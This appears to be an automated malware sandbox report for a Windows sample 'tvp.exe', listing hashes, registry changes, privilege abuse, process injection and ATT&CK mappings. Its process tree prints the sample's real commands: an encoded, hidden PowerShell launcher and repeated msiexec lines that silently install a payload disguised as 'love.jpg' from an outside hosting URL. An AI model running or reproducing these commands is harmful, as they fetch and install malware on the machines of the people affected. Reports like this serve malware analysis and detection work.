50fa244bace65606484686c0468c38c07cacf8d51dd4be774e231dc94b63371c

General

Target

Res/tvp.exe
Size

228KB
MD5

de2052aae5a5915d09d9d1ede714865c
SHA1

2161a471b598ea002fc2a1cc4b65dbb8da14a88e
SHA256

1d3f51b33070b5b8f11c891bb160f5f737151f3a36c2e24f96c2844b089a5294
SHA512

914eb403bc0662266e9b00f52da192463ae782c301be5279579fe88924451fa8b38a9cc9e689499ae7240259e7c03310980f06a5f7cd1b90bda0b3948fb5d1b3
SSDEEP

3072:0QUurm/I/Pc1fsrHxbGL+9QD2pkIanLqf0bAadkp2guonxKzjMMDE0BB6p2wkLqj:lRrXECWDianeuonmRankL

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

msiexec.exe

flow pid process

4 2704 msiexec.exe
6 2704 msiexec.exe
7 2704 msiexec.exe
Use of msiexec (install) with remote resource 3 IoCs

Processes:

msiexec.exemsiexec.exemsiexec.exe

pid process

2124 msiexec.exe
2568 msiexec.exe
2420 msiexec.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

flow	pid	process
4	2704	msiexec.exe
6	2704	msiexec.exe
7	2704	msiexec.exe

pid	process
2124	msiexec.exe
2568	msiexec.exe
2420	msiexec.exe

Modifies registry class 10 IoCs

Processes:

tvp.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open\command	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open	tvp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Res\\tvp.exe %1"	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open\command	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open	tvp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Res\\tvp.exe -dvd %1"	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd	tvp.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

PowerShell.exepowershell.exepowershell.exepowershell.exe

pid	process
2984	PowerShell.exe
2984	PowerShell.exe
2984	PowerShell.exe
2984	PowerShell.exe
2984	PowerShell.exe
2984	PowerShell.exe
2872	powershell.exe
2936	powershell.exe
2040	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

PowerShell.exepowershell.exepowershell.exepowershell.exemsiexec.exemsiexec.exemsiexec.exemsiexec.exe

description	pid	process
Token: SeDebugPrivilege	2984	PowerShell.exe
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeShutdownPrivilege	2568	msiexec.exe
Token: SeShutdownPrivilege	2124	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2568	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2124	msiexec.exe
Token: SeShutdownPrivilege	2420	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2420	msiexec.exe
Token: SeRestorePrivilege	2704	msiexec.exe
Token: SeTakeOwnershipPrivilege	2704	msiexec.exe
Token: SeSecurityPrivilege	2704	msiexec.exe
Token: SeCreateTokenPrivilege	2568	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2568	msiexec.exe
Token: SeLockMemoryPrivilege	2568	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2568	msiexec.exe
Token: SeMachineAccountPrivilege	2568	msiexec.exe
Token: SeTcbPrivilege	2568	msiexec.exe
Token: SeSecurityPrivilege	2568	msiexec.exe
Token: SeTakeOwnershipPrivilege	2568	msiexec.exe
Token: SeLoadDriverPrivilege	2568	msiexec.exe
Token: SeSystemProfilePrivilege	2568	msiexec.exe
Token: SeSystemtimePrivilege	2568	msiexec.exe
Token: SeProfSingleProcessPrivilege	2568	msiexec.exe
Token: SeIncBasePriorityPrivilege	2568	msiexec.exe
Token: SeCreatePagefilePrivilege	2568	msiexec.exe
Token: SeCreatePermanentPrivilege	2568	msiexec.exe
Token: SeBackupPrivilege	2568	msiexec.exe
Token: SeRestorePrivilege	2568	msiexec.exe
Token: SeShutdownPrivilege	2568	msiexec.exe
Token: SeDebugPrivilege	2568	msiexec.exe
Token: SeAuditPrivilege	2568	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2568	msiexec.exe
Token: SeChangeNotifyPrivilege	2568	msiexec.exe
Token: SeRemoteShutdownPrivilege	2568	msiexec.exe
Token: SeUndockPrivilege	2568	msiexec.exe
Token: SeSyncAgentPrivilege	2568	msiexec.exe
Token: SeEnableDelegationPrivilege	2568	msiexec.exe
Token: SeManageVolumePrivilege	2568	msiexec.exe
Token: SeImpersonatePrivilege	2568	msiexec.exe
Token: SeCreateGlobalPrivilege	2568	msiexec.exe
Token: SeCreateTokenPrivilege	2420	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2420	msiexec.exe
Token: SeLockMemoryPrivilege	2420	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2420	msiexec.exe
Token: SeMachineAccountPrivilege	2420	msiexec.exe
Token: SeTcbPrivilege	2420	msiexec.exe
Token: SeSecurityPrivilege	2420	msiexec.exe
Token: SeTakeOwnershipPrivilege	2420	msiexec.exe
Token: SeLoadDriverPrivilege	2420	msiexec.exe
Token: SeSystemProfilePrivilege	2420	msiexec.exe
Token: SeSystemtimePrivilege	2420	msiexec.exe
Token: SeProfSingleProcessPrivilege	2420	msiexec.exe
Token: SeIncBasePriorityPrivilege	2420	msiexec.exe
Token: SeCreatePagefilePrivilege	2420	msiexec.exe
Token: SeCreatePermanentPrivilege	2420	msiexec.exe
Token: SeBackupPrivilege	2420	msiexec.exe
Token: SeRestorePrivilege	2420	msiexec.exe
Token: SeShutdownPrivilege	2420	msiexec.exe
Token: SeDebugPrivilege	2420	msiexec.exe
Token: SeAuditPrivilege	2420	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2420	msiexec.exe
Token: SeChangeNotifyPrivilege	2420	msiexec.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

tvp.exe

pid process

3048 tvp.exe
3048 tvp.exe
3048 tvp.exe

pid	process
3048	tvp.exe
3048	tvp.exe
3048	tvp.exe

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

tvp.exePowerShell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3048 wrote to memory of 2984	3048	tvp.exe	PowerShell.exe
PID 3048 wrote to memory of 2984	3048	tvp.exe	PowerShell.exe
PID 3048 wrote to memory of 2984	3048	tvp.exe	PowerShell.exe
PID 3048 wrote to memory of 2984	3048	tvp.exe	PowerShell.exe
PID 2984 wrote to memory of 2872	2984	PowerShell.exe	powershell.exe
PID 2984 wrote to memory of 2872	2984	PowerShell.exe	powershell.exe
PID 2984 wrote to memory of 2872	2984	PowerShell.exe	powershell.exe
PID 2984 wrote to memory of 2872	2984	PowerShell.exe	powershell.exe
PID 2984 wrote to memory of 2936	2984	PowerShell.exe	powershell.exe
PID 2984 wrote to memory of 2936	2984	PowerShell.exe	powershell.exe
PID 2984 wrote to memory of 2936	2984	PowerShell.exe	powershell.exe
PID 2984 wrote to memory of 2936	2984	PowerShell.exe	powershell.exe
PID 2984 wrote to memory of 2040	2984	PowerShell.exe	powershell.exe
PID 2984 wrote to memory of 2040	2984	PowerShell.exe	powershell.exe
PID 2984 wrote to memory of 2040	2984	PowerShell.exe	powershell.exe
PID 2984 wrote to memory of 2040	2984	PowerShell.exe	powershell.exe
PID 2936 wrote to memory of 2124	2936	powershell.exe	msiexec.exe
PID 2936 wrote to memory of 2124	2936	powershell.exe	msiexec.exe
PID 2936 wrote to memory of 2124	2936	powershell.exe	msiexec.exe
PID 2936 wrote to memory of 2124	2936	powershell.exe	msiexec.exe
PID 2936 wrote to memory of 2124	2936	powershell.exe	msiexec.exe
PID 2936 wrote to memory of 2124	2936	powershell.exe	msiexec.exe
PID 2936 wrote to memory of 2124	2936	powershell.exe	msiexec.exe
PID 2040 wrote to memory of 2420	2040	powershell.exe	msiexec.exe
PID 2040 wrote to memory of 2420	2040	powershell.exe	msiexec.exe
PID 2040 wrote to memory of 2420	2040	powershell.exe	msiexec.exe
PID 2040 wrote to memory of 2420	2040	powershell.exe	msiexec.exe
PID 2040 wrote to memory of 2420	2040	powershell.exe	msiexec.exe
PID 2040 wrote to memory of 2420	2040	powershell.exe	msiexec.exe
PID 2040 wrote to memory of 2420	2040	powershell.exe	msiexec.exe
PID 2872 wrote to memory of 2568	2872	powershell.exe	msiexec.exe
PID 2872 wrote to memory of 2568	2872	powershell.exe	msiexec.exe
PID 2872 wrote to memory of 2568	2872	powershell.exe	msiexec.exe
PID 2872 wrote to memory of 2568	2872	powershell.exe	msiexec.exe
PID 2872 wrote to memory of 2568	2872	powershell.exe	msiexec.exe
PID 2872 wrote to memory of 2568	2872	powershell.exe	msiexec.exe
PID 2872 wrote to memory of 2568	2872	powershell.exe	msiexec.exe

C:\Users\Admin\AppData\Local\Temp\Res\tvp.exe
"C:\Users\Admin\AppData\Local\Temp\Res\tvp.exe"
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
PowerShell -nop -exec bypass -w Hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMwA7ACQAaQArACsAKQANAAoAewANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFYAZQByAGIAIAByAHUAbgBBAHMAIAAnAG0AcwBpAGUAeABlAGMAIAAvAGkAIABoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AbQBuAHcATwBEAEIAcAB0AEsANgBqAFUALwA2ADIAOABmAHIAQQBMAHQAQQBjAG0ATwAvAG0AYQBpAG4ALwBsAG8AdgBlAC4AagBwAGcAIAAvAHEAJwANAAoAfQANAAoA
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2872

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2420

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2704

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VVZXYY6XNVG4UMGZK0FS.temp
Filesize
7KB

MD5
a55dfd39aaea78864b54062336cd1c6c

SHA1
8d94a26472d74f85f49271886562e874043d6a1c

SHA256
a07366802e5c81022c531b5c8d3bb4e7d7b67b8f8e3a52b7b2a5443252ac3ba5

SHA512
b7622be23fad02760d0de0c8200b442f219cfc11369d50e43d39975bdc40aa9e21ca94525854ed3a59fc1734c1ec71541569967ebbeeaaae75dcfb66ab9f0c37

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
a55dfd39aaea78864b54062336cd1c6c

SHA1
8d94a26472d74f85f49271886562e874043d6a1c

SHA256
a07366802e5c81022c531b5c8d3bb4e7d7b67b8f8e3a52b7b2a5443252ac3ba5

SHA512
b7622be23fad02760d0de0c8200b442f219cfc11369d50e43d39975bdc40aa9e21ca94525854ed3a59fc1734c1ec71541569967ebbeeaaae75dcfb66ab9f0c37

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
a55dfd39aaea78864b54062336cd1c6c

SHA1
8d94a26472d74f85f49271886562e874043d6a1c

SHA256
a07366802e5c81022c531b5c8d3bb4e7d7b67b8f8e3a52b7b2a5443252ac3ba5

SHA512
b7622be23fad02760d0de0c8200b442f219cfc11369d50e43d39975bdc40aa9e21ca94525854ed3a59fc1734c1ec71541569967ebbeeaaae75dcfb66ab9f0c37

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
a55dfd39aaea78864b54062336cd1c6c

SHA1
8d94a26472d74f85f49271886562e874043d6a1c

SHA256
a07366802e5c81022c531b5c8d3bb4e7d7b67b8f8e3a52b7b2a5443252ac3ba5

SHA512
b7622be23fad02760d0de0c8200b442f219cfc11369d50e43d39975bdc40aa9e21ca94525854ed3a59fc1734c1ec71541569967ebbeeaaae75dcfb66ab9f0c37

Download Submit
memory/2936-71-0x0000000002780000-0x00000000027C0000-memory.dmp

Filesize
256KB

Download
memory/2984-58-0x0000000002710000-0x0000000002750000-memory.dmp

Filesize
256KB

Download
memory/2984-59-0x0000000002710000-0x0000000002750000-memory.dmp

Filesize
256KB

Download
memory/3048-54-0x0000000000020000-0x000000000003F000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads